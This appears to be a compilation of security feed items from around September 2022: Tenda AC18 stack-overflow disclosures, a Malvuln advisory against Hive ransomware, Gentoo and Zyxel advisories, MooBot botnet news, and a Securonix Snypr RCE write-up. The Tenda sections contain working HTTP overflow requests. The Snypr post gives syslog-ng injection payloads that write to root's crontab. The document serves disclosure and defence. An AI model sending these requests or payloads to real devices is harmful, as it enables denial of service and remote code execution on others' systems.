Tenda AC18 router v15.03.05.19 and v15.03.05.05 was discovered to contain a stack overflow via the urls parameter at /goform/saveParentControlInfo.

**Tenda AC18 Unauthorized stack overflow vulnerability******1\. Affected version:****

V15.03.05.05\_multi and V15.03.05.19\_multi

****2\. Firmware download address****

https://www.tenda.com.cn/download/detail-2683.html

****3\. Vulnerability details****

In function saveParentControlInfo, the content obtained by the program from the urls parameter is passed to V24, and then the V24 is directly copied into the V17 + 80 stack through the strcpy function. There is no size check, so there is a stack overflow vulnerability. The attacker can easily perform a Deny of Service Attack or Remote Code Execution with carefully crafted overflow data.

****4\. Recurring vulnerabilities and POC****

In order to reproduce the vulnerability, the following steps can be followed:

1.Use the fat simulation firmware V15.03.05.19\_multi

2.Attack with the following overflow POC attacks

    POST /goform/saveParentControlInfo HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 143
    Origin: http://192.168.0.1
    Connection: close
    Referer: http://192.168.0.1/parental_control.html?random=0.524930998878748&
    Cookie: password=0d403f6ad9aea37a98da9255140dbf6ecmucvb
    
    deviceId=02%3A03%3A04%3A05%3A06%3A07&deviceName=&enable=1&time=19%3A0021%3A00&url_enable=1&urls=ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss&day=1%2C1%2C1%2C1%2C1%2C1%2C1&limit_type=0
    

This PoC can result in a Dos.

CVE-2022-38314: NWPU_Projct/Tenda/AC18/1 at main · rickytriky/NWPU_Projct

Tenda AC18 router v15.03.05.19 and v15.03.05.05 was discovered to contain a stack overflow via the time parameter at /goform/saveParentControlInfo.

**Tenda AC18 Unauthorized stack overflow vulnerability******1\. Affected version:****

V15.03.05.05\_multi and V15.03.05.19\_multi

****2\. Firmware download address****

https://www.tenda.com.cn/download/detail-2683.html

****3\. Vulnerability details****

In function saveParentControlInfo, the content obtained by the program from the time parameter is passed to nptr, and then the nptr is directly copied into the V17 + 34 stack through the strcpy function. There is no size check, so there is a stack overflow vulnerability. The attacker can easily perform a Deny of Service Attack or Remote Code Execution with carefully crafted overflow data.

****4\. Recurring vulnerabilities and POC****

In order to reproduce the vulnerability, the following steps can be followed:

1.Use the fat simulation firmware V15.03.05.19\_multi

2.Attack with the following overflow POC attacks

    POST /goform/saveParentControlInfo HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 1467
    Origin: http://192.168.0.1
    Connection: close
    Referer: http://192.168.0.1/parental_control.html?random=0.7639560863840195&
    Cookie: password=0d403f6ad9aea37a98da9255140dbf6ebyzcvb
    
    deviceId=02%3A03%3A04%3A05%3A06%3A07&deviceName=&enable=1&time=1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111119%3A0021%3A00&url_enable=1&urls=baidu&day=1%2C1%2C1%2C1%2C1%2C1%2C1&limit_type=0
    

This PoC can result in a Dos.

CVE-2022-38313: NWPU_Projct/Tenda/AC18/2 at main · rickytriky/NWPU_Projct

Tenda AC18 router v15.03.05.19 and v15.03.05.05 was discovered to contain a stack overflow via the list parameter at /goform/SetIpMacBind.

**Tenda AC18 Unauthorized stack overflow vulnerability******1\. Affected version:****

V15.03.05.05\_multi and V15.03.05.19\_multi

****2\. Firmware download address****

https://www.tenda.com.cn/download/detail-2683.html

****3\. Vulnerability details****

In function fromSetIpMacBind, the content obtained by the program from the list parameter is passed to V22, and then the V22 is directly copied into the dest stack through the strcpy function. There is no size check, so there is a stack overflow vulnerability. The attacker can easily perform a Deny of Service Attack or Remote Code Execution with carefully crafted overflow data.

****4\. Recurring vulnerabilities and POC****

In order to reproduce the vulnerability, the following steps can be followed:

1.Use the fat simulation firmware V15.03.05.19\_multi

2.Attack with the following overflow POC attacks

    POST /goform/SetIpMacBind HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
    Accept: /
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 47
    Origin: http://192.168.0.1
    Connection: close
    Referer: http://192.168.0.1/ip_mac_bind.html?random=0.09748691576858626&
    Cookie: password=0d403f6ad9aea37a98da9255140dbf6eewxcvb
    
    bindnum=1&list=02:03:04:05:06:07192.168.0.111aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    

This PoC can result in a Dos.

CVE-2022-38312: NWPU_Projct/Tenda/AC18/3 at main · rickytriky/NWPU_Projct

Tenda AC18 router v15.03.05.19 and v15.03.05.05 was discovered to contain a stack overflow via the time parameter at /goform/PowerSaveSet.

**Tenda AC18 Unauthorized stack overflow vulnerability******1\. Affected version:****

V15.03.05.05\_multi and V15.03.05.19\_multi

****2\. Firmware download address****

https://www.tenda.com.cn/download/detail-2683.html

****3\. Vulnerability details****

In function setSmartPowerManagement， the v13 variable is obtained directly from the http request parameter time . Then v13 will be splice to stack by function sscanf without any security check, which causes stack overflow. The attacker can easily perform a Deny of Service Attack or Remote Code Execution with carefully crafted overflow data.

****4\. Recurring vulnerabilities and POC****

In order to reproduce the vulnerability, the following steps can be followed:

1.Use the fat simulation firmware V15.03.05.19\_multi

2.Attack with the following overflow POC attacks

    POST /goform/PowerSaveSet HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
    Accept: /
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 1999
    Origin: http://192.168.0.1
    Connection: close
    Referer: http://192.168.0.1/sleep_mode.html?random=0.9629635312680853&
    Cookie: password=0d403f6ad9aea37a98da9255140dbf6ektscvb
    
    powerSavingEn=1&time=111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111100%3A0001%3A00&ledCloseType=allClose&powerSaveDelay=1
    

This PoC can result in a Dos.

CVE-2022-38311: NWPU_Projct/Tenda/AC18/5 at main · rickytriky/NWPU_Projct

Trojan-Ransom.Win32.Hive.bv malware suffers from a code execution vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/44aba241dd3f0d156c6ed82a0ab3a9e1.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Trojan-Ransom.Win32.Hive.bvVulnerability: Arbitrary Code ExecutionDescription: Hive Ransomware will load and execute arbitrary .EXE PE files if a third-party adversary or defender uses the vulnerable naming convention of "vssadmin.exe" or "wmic.exe" and the PE file is placed in the vacinity of Hive Ransomware when it is executed.Family: HiveType: PE64MD5: 44aba241dd3f0d156c6ed82a0ab3a9e1Vuln ID: MVID-2022-0636Disclosure: 09/06/2022Exploit/PoC:1) Compile to "vssadmin.exe"2) Supplying Hive CL credentials e.g. -u <login>:<password>"vssadmin.c"#include "windows.h"#include "tlhelp32.h"#include "psapi.h"//Compiled x64//By Malvuln - 2022//Purpose: RCE PWN Hive Ransomware//MD5: 44aba241dd3f0d156c6ed82a0ab3a9e1/** DISCLAIMER:Author is NOT responsible for any damages whatsoever by using this software or improper malwarehandling. By using this code you assume and accept all risk implied or otherwise.**/DWORD getParentPID(DWORD pid){    HANDLE h32 = NULL;    PROCESSENTRY32 pe = {0};    DWORD ppid = 0;    pe.dwSize = sizeof(PROCESSENTRY32);    h32 = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);    if(Process32First(h32, &pe)){        do{            if (pe.th32ProcessID == pid){                ppid = pe.th32ParentProcessID;                break;            }        } while( Process32Next(h32, &pe));    }    CloseHandle(h32);    return (ppid);}int main(void){    DWORD ppid = getParentPID(GetCurrentProcessId());    HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, ppid);     if (NULL != handle) {           TerminateProcess(handle, 0);       CloseHandle(handle);       MessageBox(NULL, "Not the vssadmin.exe you wanted :(\nHive Ransomware PWNED!\n\nBy Malvuln", "Code Execution PoC\n", MB_OK);     }    return 0;}Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Trojan-Ransom.Win32.Hive.bv MVID-2022-0636 Code Execution

Gentoo Linux Security Advisory 202209-1 - A vulnerability has been discovered in GNU Gzip and XZ Utils' grep helpers which could result in writes to arbitrary files. Versions less than 1.12 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202209-01  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: GNU Gzip, XZ Utils: Arbitrary file write  
     Date: September 07, 2022  
     Bugs: #837152, #837155  
       ID: 202209-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in GNU Gzip and XZ Utils' grep  
helpers which could result in writes to arbitrary files.

Background  
==========

GNU Gzip is a popular data compression program.

XZ Utils is free general-purpose data compression software with a high  
compression ratio.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  app-arch/gzip              < 1.12                        >= 1.12  
  2  app-arch/xz-utils          < 5.2.5                      >= 5.2.5

Description  
===========

GNU Gzip and XZ Utils' grep helpers do not sufficiently validate certain  
multi-line file names.

Impact  
======

In some cases, writing to arbitrary files such as shell initialization files can be escalation to remote code execution.

Workaround  
==========

Ensuring only trusted input is passed to GNU Gzip and XZ Utils' grep helpers minimizes the potential impact.

Resolution  
==========

All GNU Gzip users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-arch/gzip-1.12"

All XZ Utils users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-arch/xz-utils-5.2.5"

References  
==========

[ 1 ] CVE-2022-1271  
      https://nvd.nist.gov/vuln/detail/CVE-2022-1271

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202209-01

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202209-01

By Deeba Ahmed
The botnet is exploiting four different vulnerabilities in D-Link devices.
This is a post from HackRead.com Read the original post: Mirai botnet resurfaces with MooBot variant to target D-Link devices

Palo Alto Networks’ Unit 42 researchers have reported the emergence of a new **Mirai botnet** variant dubbed MooBot. This variant is looking for unpatched D-Link devices to create its army of DDoS (distributed denial of service) bots. For compromising vulnerable D-Link routers, MooBot uses multiple exploits

**Re-Emergence of Notorious MooBot**

The MooBot botnet was first discovered by Qihoo 360’s Netlab in Sep 2019, whereas the most recent wave of attacks involving MooBot, before the one detected by Palo Alto, was discovered by Fortinet analysts in Dec 2021. Researchers identified that MooBot targeted a flaw in Hikvision cameras and enlisted a large number of devices into its DDoS army.

In early August, Unit 42 researchers discovered a new attack wave. This time, MooBot’s targets were **unpatched D-Link routers**, which it compromised using old and new exploits.

**Exploited Vulnerabilities**

The botnet is exploiting four different vulnerabilities in D-Link devices, including the following:

*   CVE-2022-26258 (CVSS score: 9.8) – D-Link Remote Command Execution Vulnerability
*   CVE-2022-28958 (CVSS score: 9.8) – D-Link Remote Command Execution Vulnerability
*   CVE-2015-2051 (CVSS score: 10.0) – D-Link HNAP SOAPAction Header Command Execution Vulnerability
*   CVE-2018-6530 (CVSS score: 9.8) – D-Link SOAP Interface Remote Code Execution Vulnerability

Source: **Palo Alto Networks**

Previously it targeted LILIN digital video recorders apart from **Hikvision video surveillance devices**.

**What Happens If Devices are Compromised?**

According to Unit 42 researchers, an attacker can gain full control of the compromised devices. They can use them to perform various attacks, including remote code execution and retrieving MooBot payload from a remote host to parse instructions from a C2 server and **launch DDoS attacks**. It can also target specific port numbers and IP addresses for DDoS.

Campaign overview (Palo Alto Networks)

D-Link has released security updates to address the flaws. However, there are still countless unpatched devices. Many are yet to be patched for the last two vulnerabilities (**CVE-2022-26258**, **CVE-2022-28958**) discovered in March and May 2022.

The low-attack complexity of the vulnerabilities lets the attacker gain remote code execution, and using arbitrary commands they can easily get malware binary. It is worth noting that the C2 address used in the current attack wave is different from the wave identified by Fortinet.

It is necessary to **apply patches** as soon as possible and keep your device updated to prevent the MooBot threat.

1.  **Hackers behind Mirai botnet & DYN DDoS attacks plead guilty**
2.  **Reaper malware outshines Mirai; hits millions of IoT devices worldwide**
3.  **Tiny Mantis Botnet Can Launch More Powerful DDoS Attacks Than Mirai**
4.  **Persirai malware in action: IP cameras all across the world compromised**
5.  **Mirai Variant ‘OMG’ Turns IoT Devices into Proxy Servers for Cryptomining**

Mirai botnet resurfaces with MooBot variant to target D-Link devices

An injection vulnerability in the syslog-ng configuration wizard in Securonix Snypr 6.4 allows an application user with the "Manage Ingesters" permission to execute arbitrary code on remote ingesters by appending arbitrary text to text files that are executed by the system, such as users' crontab files. The patch for this was present in SNYPR version 6.4 Jun 2022 R3_[06170871], but may have been introduced sooner.

Over the course of the last six months or so, I’ve had the distinct pleasure of working with Securonix Snypr, an on-prem or cloud-hosted SIEM solution. I find SIEMs to be fairly boring, so after some time acting as a system administrator for the platform, I started pentesting it - and it didn’t take long to find some issues. In this post, I’ll discuss a remote code execution vulnerability that I found in the console’s syslog-ng configuration settings. But first, a brief overview on how Securonix functions in a typical cloud-hosted environment.

**Remote Ingesters (RINs)**

RINs are hosts that are tasked with retrieving logs and shipping them to the cloud-hosted (or on-prem) application back-end for collection and processing. They may be controlled by the customer or Securonix. For example, the deployment I used had an on-prem RIN for local network log collection, and a Securonix-managed cloud RIN for capturing logs from Internet-facing cloud services. RINs can collect logs through syslog-ng, custom collectors written by Securonix, or by any user-created method that populates files on the RIN’s disk.

**The Console**

This is the web application that you log into to manage the application. Once properly paired, the console will have root access to all RINs for the purposes of managing their syslog-ng configurations, and more. I’m sure that won’t cause any issues.

**The Vulnerability**

In the Securonix console, any user with the “Manage Ingesters” permission is allowed to define syslog-ng source statements for any RIN under Administration -> Settings -> Manage Ingesters. The “Create/Edit Source” action for each RIN allows the user to enter pre-formatted text directly into the RIN’s syslog-ng configuration file. That’s right - it’s not a wizard, it just copies text into the file. When I say “pre-formatted”, I simply mean that the user separates the name and expression for the syslog-ng source. When submitting a name and expression, the console will simply put the raw text after a “source” statement.

eg. from the following input:

    Source name: TCP_514
    Source expression: {tcp(port(514));};
    

you get this output in your syslog-ng configuration file:

    Source TCP_514 {tcp(port(514));};
    

Ok, simple enough. But what else can you do in syslog-ng configurations? To log something with syslog-ng, you need to define a source and destination, and join the two with a log statement. Securonix typically takes care of setting up destination and log statements, but we can write our own in the source expression field since we’re just entering arbitrary text, after all.

There are quite a lot of options for source and destination statements. To get RCE, we’re simply concerned with putting arbitrary text _somewhere_ on disk. For a source statement, you can pick whatever you want as long as it’ll be appended to at some point, so that syslog-ng will log to the destination. For example, file("/var/log/syslog") would likely be a fine source to use here. For the destination, we want to write attacker-controlled text to _some_ file. To define the attacker-controlled text, we can simply write a string in the destination with the template function. eg. file("/path/to/out_file" template("\narbitrary text\n"). While we’re here, we can override whatever options Securonix sets by default for file ownership, just so we don’t mess with the output file’s pre-existing permissions (if we’re appending to an existing file). Here’s what we have so far:

{file("/var/log/syslog");}; destination test_dest {file("/path/to/out_file" template("\narbitrary text\n"));}; options { owner("root"); group("root"); perm(0600);};

Now, how can we get from arbitrary text to executable code? You could append to a user’s .bashrc or .profile, but there are a number of considerations here. First, you don’t know _when_ the user will log in, if ever. Second, the shell script you’re appending to (provided it exists) may have an exit (or similar) statement above it, causing appended lines to never be executed. However, since syslog-ng runs as root, we have access to all users’ crontab files. A simple destination of file("/var/spool/cron/root" template("\n* * * * * arbitrary code\n")) will do the trick quite nicely. This destination should get the quickest results, but since we can append to any file, options for arbitrary code execution are endless. If you really wanted to, you could even write to rc.local, and then force a reboot by writing to /proc/sys/kernel/sysrq and /proc/sysrq-trigger.

**Demo**

In this demo, I specify a non-existent file (/source.log) in the source statement simply to control the timing of the output being written. You could easily select a high-traffic system log, such as /var/log/syslog, but I only wanted to get _one_ instance of my arbitrary code to the output. Each new line in the source file will output the templated text to the destination file, which could get quite annoying.

In case you’re curious, this is the source expression used in the demo:

{file("/source.log");}; destination test_dest {file("/var/spool/cron/root" template("\n#* * * * *  arbitrary code\n"));}; log {source(vuln_test); destination (test_dest);}; options { owner("root"); group("root"); perm(0600);};

Your browser does not support the video tag.**Potential Impact**

When exploited, this vulnerability allows an attacker with the “Manage Ingesters” permission on a Securonix instance to execute arbitrary code as root on all RINs paired to the instance’s console. As noted above, Securonix typically grants access to cloud-hosted RINs in cloud deployments. With this in mind, an attacker could possibly gain a foothold in Securonix’ cloud environment. The same is true for on-prem RINs.

**The Patch**

As noted in the below timeline, this vulnerability was patched by Securonix sometime before July 2022, and at the latest in SNYPR version 6.4 Jun 2022 R3\_\[06170871\]. Their patch notes don’t identify this fix, which is odd, since they seemed alright with me publishing a CVE about the vulnerability. Although I was consulted during the patching effort, I’m not privy to the “solution”. Yet, when attempting to use a malicious expression, the console UI simply states “complex source expressions are not allowed” and does not save the attempted source expression to the RIN. This may interfere with legitimate source expressions, as I can definitely see power-users doing a _lot_ in source statements.

**Closing**

I must clarify that this vulnerability does not allow for RCE on the console itself, as you cannot write syslog-ng configuration rules for the console.

**Disclosure Timeline**

*   2022-04-14 Disclosure sent to Securonix
*   2022-06-??: Patched Snypr version (specific version unknown) released
*   2022-07-25: Applied for CVE-37108
*   2022-08-29: Vulnerability made public

**References**

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37108

CVE-2022-37108: Remote Code Execution in Securonix Snypr (CVE-2022-37108) - conway.scot

A variant of the Mirai botnet known as MooBot is co-opting vulnerable D-Link devices into an army of denial-of-service bots by taking advantage of multiple exploits.
"If the devices are compromised, they will be fully controlled by attackers, who could utilize those devices to conduct further attacks such as distributed denial-of-service (DDoS) attacks," Palo Alto Networks Unit 42 said in a

A variant of the Mirai botnet known as MooBot is co-opting vulnerable D-Link devices into an army of denial-of-service bots by taking advantage of multiple exploits.

"If the devices are compromised, they will be fully controlled by attackers, who could utilize those devices to conduct further attacks such as distributed denial-of-service (DDoS) attacks," Palo Alto Networks Unit 42 said in a Tuesday report.

MooBot, first disclosed by Qihoo 360's Netlab team in September 2019, has previously targeted LILIN digital video recorders and Hikvision video surveillance products to expand its network.

In the latest wave of attacks discovered by Unit 42 in early August 2022, as many as four different flaws in D-Link devices, both old and new, have paved the way for the deployment of MooBot samples. These include -

*   **CVE-2015-2051** (CVSS score: 10.0) - D-Link HNAP SOAPAction Header Command Execution Vulnerability
*   **CVE-2018-6530** (CVSS score: 9.8) - D-Link SOAP Interface Remote Code Execution Vulnerability
*   **CVE-2022-26258** (CVSS score: 9.8) - D-Link Remote Command Execution Vulnerability, and
*   **CVE-2022-28958** (CVSS score: 9.8) - D-Link Remote Command Execution Vulnerability

Successful exploitation of the aforementioned flaws could lead to remote code execution and the retrieval of a MooBot payload from a remote host, which then parses instructions from a command-and-control (C2) server to launch a DDoS attack on a specific IP address and port number.

Customers of D-Link appliances are highly recommended to apply patches and upgrades released by the company to mitigate potential threats.

"The vulnerabilities \[...\] have low attack complexity but critical security impact that can lead to remote code execution," the researchers said. "Once the attacker gains control in this manner, they could take advantage by including the newly compromised devices into their botnet to conduct further attacks such as DDoS."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Mirai Variant MooBot Botnet Exploiting D-Link Router Vulnerabilities

Networking equipment maker Zyxel has released patches for a critical security flaw impacting its network-attached storage (NAS) devices.
Tracked as CVE-2022-34747 (CVSS score: 9.8), the issue relates to a "format string vulnerability" affecting NAS326, NAS540, and NAS542 models. Zyxel credited researcher Shaposhnikov Ilya for reporting the flaw.
"A format string vulnerability was found in a

Networking equipment maker Zyxel has released patches for a critical security flaw impacting its network-attached storage (NAS) devices.

Tracked as CVE-2022-34747 (CVSS score: 9.8), the issue relates to a "format string vulnerability" affecting NAS326, NAS540, and NAS542 models. Zyxel credited researcher Shaposhnikov Ilya for reporting the flaw.

"A format string vulnerability was found in a specific binary of Zyxel NAS products that could allow an attacker to achieve unauthorized remote code execution via a crafted UDP packet," the company said in an advisory released on September 6.

The flaw affects the following versions -

*   NAS326 (V5.21(AAZF.11)C0 and earlier)
*   NAS540 (V5.21(AATB.8)C0 and earlier), and
*   NAS542 (V5.21(ABAG.8)C0 and earlier)

The disclosure comes as Zyxel previously addressed local privilege escalation and authenticated directory traversal vulnerabilities (CVE-2022-30526 and CVE-2022-2030) affecting its firewall products in July.

Hacking NAS devices is becoming a common practice. If you don't take precautions or keep the software up to date, attackers can steal your sensitive and personal data. In some instances, they even manage to permanently delete data.

In June 2022, it also remediated a security vulnerability (CVE-2022-0823) that left GS1200 series switches susceptible to password-guessing attacks via a timing side-channel attack.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#rce